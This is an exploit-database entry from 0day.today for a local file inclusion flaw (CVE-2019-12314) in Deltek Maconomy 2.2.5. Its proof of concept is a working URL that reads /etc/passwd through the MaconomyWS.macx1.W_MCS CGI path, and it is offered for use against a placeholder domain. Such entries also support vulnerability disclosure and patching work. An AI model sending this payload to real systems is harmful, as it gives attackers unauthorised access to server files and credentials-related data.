Deltek Maconomy 2.2.5 Local File Inclusion Vulnerability

2019-05-28T00:00:00
ID 1337DAY-ID-32816
Type zdt
Reporter Jameel Nabbo
Modified 2019-05-28T00:00:00

Description

Exploit for cgi platform in category web applications

                                        
                                            # Exploit Title: Maconomy Erp local file include
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com
# Vendor Homepage: https://www.deltek.com
# Software Link: https://www.deltek.com/en-gb/products/project-erp/maconomy
# CVE: CVE-2019-12314
POC:

POC:
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//LFI
Example
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd

#  0day.today [2019-05-29]  #